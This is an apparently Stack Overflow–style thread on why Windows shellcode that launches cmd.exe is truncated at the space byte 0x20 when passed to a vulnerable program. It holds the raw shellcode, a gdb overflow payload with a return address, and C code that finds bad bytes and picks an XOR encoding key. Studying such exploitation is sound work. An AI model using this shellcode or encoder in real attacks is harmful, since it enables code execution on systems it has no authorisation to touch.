shellcode is truncated by \x20


Why is my shellcode truncated after the \x20 opcode when it is copied as a string onto the stack in a second vulnerable program?

--cmd.exe--
char shell[] =
    "\xc7\x44\x24\x0c\x65\x78\x65\x20"  // mov dword [esp+0xc], "exe "   ← only this line ends up on the stack, though there is enough space
    "\xc7\x44\x24\x08\x63\x6d\x64\x2e"  // mov dword [esp+0x8], "cmd."
    "\x31\xc0"                          // xor eax, eax
    "\x89\x44\x24\x04"                  // mov [esp+0x4], eax      (second argument = 0)
    "\x8d\x44\x24\x08"                  // lea eax, [esp+0x8]
    "\x89\x04\x24"                      // mov [esp], eax          (first argument: pointer to "cmd.exe ")
    "\x8d\x05\xad\x23\x86\x7c"          // lea eax, [0x7c8623ad]
    "\xff\xd0";                         // call eax
--end shell--

BlueRaja - Danny Pflughoeft On BEST ANSWER

Are you passing this shellcode as a command-line argument? In that case, take a look at the ASCII code for 0x20 ;)

Steve Quezadas On

My theory is that things like quote, space, null, etc. are being interpreted by the Windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try Metasploit's msfencode utility to avoid those opcodes altogether. I know null (\x00), space (\x20) and quote (\x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.

That's my solution, but does anyone know of any other ones that are better?
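To make the two points above concrete (the question's truncation at the first 0x20, and the "encode it" approach in this answer), here is an added example that is not part of the question or of any answer. It takes the shellcode exactly as posted, scans it for the three bytes this answer names as unsafe on a command line (0x00, 0x20, 0x22; that set is an assumption, real targets may have more), reports how much of the buffer would reach argv[1] unquoted, and then finds a single-byte XOR key that leaves neither the key nor any encoded byte in the bad set. The decoder stub that would have to be prepended to the encoded bytes is deliberately left out; the point is only to show why 0x20 kills the payload and how an encoder picks a key.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* The shellcode from the question, byte for byte. */
static const unsigned char shell[] =
    "\xc7\x44\x24\x0c\x65\x78\x65\x20"  /* mov dword [esp+0xc], "exe " */
    "\xc7\x44\x24\x08\x63\x6d\x64\x2e"  /* mov dword [esp+0x8], "cmd." */
    "\x31\xc0"                          /* xor eax, eax */
    "\x89\x44\x24\x04"                  /* mov [esp+4], eax */
    "\x8d\x44\x24\x08"                  /* lea eax, [esp+8] */
    "\x89\x04\x24"                      /* mov [esp], eax */
    "\x8d\x05\xad\x23\x86\x7c"          /* lea eax, [0x7c8623ad] */
    "\xff\xd0";                         /* call eax */
#define SHELL_LEN (sizeof(shell) - 1)   /* drop the C string terminator */

/* Assumed bad-byte set: 0x00 ends a C string, 0x20 splits arguments,
 * 0x22 is the shell's quote character. Extend it for a real target. */
static const unsigned char bad_bytes[] = { 0x00, 0x20, 0x22 };

static int is_bad(unsigned char b)
{
    for (size_t i = 0; i < sizeof(bad_bytes); i++)
        if (b == bad_bytes[i])
            return 1;
    return 0;
}

/* Offset of the first byte the command line would mangle, or -1 if clean. */
long first_bad_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (is_bad(buf[i]))
            return (long)i;
    return -1;
}

/* How many bytes of buf reach argv[1] when passed unquoted:
 * everything before the first NUL or space. */
size_t argv_visible_len(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (buf[i] == 0x00 || buf[i] == 0x20)
            break;
    return i;
}

/* Smallest single-byte XOR key (1..255) such that neither the key nor any
 * encoded byte is in the bad set; -1 if none exists. The key itself must be
 * clean because a decoder stub would carry it inside the payload. */
int pick_xor_key(const unsigned char *buf, size_t len)
{
    for (int key = 1; key < 256; key++) {
        if (is_bad((unsigned char)key))
            continue;
        size_t i;
        for (i = 0; i < len; i++)
            if (is_bad(buf[i] ^ (unsigned char)key))
                break;
        if (i == len)
            return key;
    }
    return -1;
}

/* XOR is its own inverse: the same call encodes and decodes. */
void xor_buf(unsigned char *out, const unsigned char *in, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

/* Encode with the chosen key, verify the result is clean, decode again and
 * confirm the round trip. Returns 1 on success, 0 on failure. */
int encode_roundtrip_ok(void)
{
    unsigned char enc[SHELL_LEN], dec[SHELL_LEN];
    int key = pick_xor_key(shell, SHELL_LEN);
    if (key < 0)
        return 0;
    xor_buf(enc, shell, SHELL_LEN, (unsigned char)key);
    if (first_bad_byte(enc, SHELL_LEN) != -1)
        return 0;
    xor_buf(dec, enc, SHELL_LEN, (unsigned char)key);
    return memcmp(dec, shell, SHELL_LEN) == 0;
}

int main(void)
{
    printf("first bad byte at offset %ld\n", first_bad_byte(shell, SHELL_LEN));
    printf("bytes that reach argv[1] unquoted: %zu of %zu\n",
           argv_visible_len(shell, SHELL_LEN), (size_t)SHELL_LEN);
    printf("xor key: 0x%02x, round trip %s\n", pick_xor_key(shell, SHELL_LEN),
           encode_roundtrip_ok() ? "ok" : "failed");
    return 0;
}
```

The scanner stops at offset 7, the trailing space of "exe ", so only 7 of the 37 bytes survive an unquoted argv trip, which matches the one-line truncation seen in the question. Keys 0x01 through 0x06 are all rejected because they turn some byte (0x23, 0x20, 0x24 or 0x05) into 0x22, 0x20 or 0x00; 0x07 is the first key that leaves every byte clean. msfencode does the same search with a larger bad-byte list and then emits the matching decoder stub in front of the encoded bytes.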

Omarix On

Put double quotation marks around the entire command. For example, run:

    "$shellcode"
    (gdb) r "$(python -c 'print "\x41" * 100 + "\x20\x83\x04\x08" + ....')"

Febriyanto Nugroho On

\x20 is <space> in ASCII format.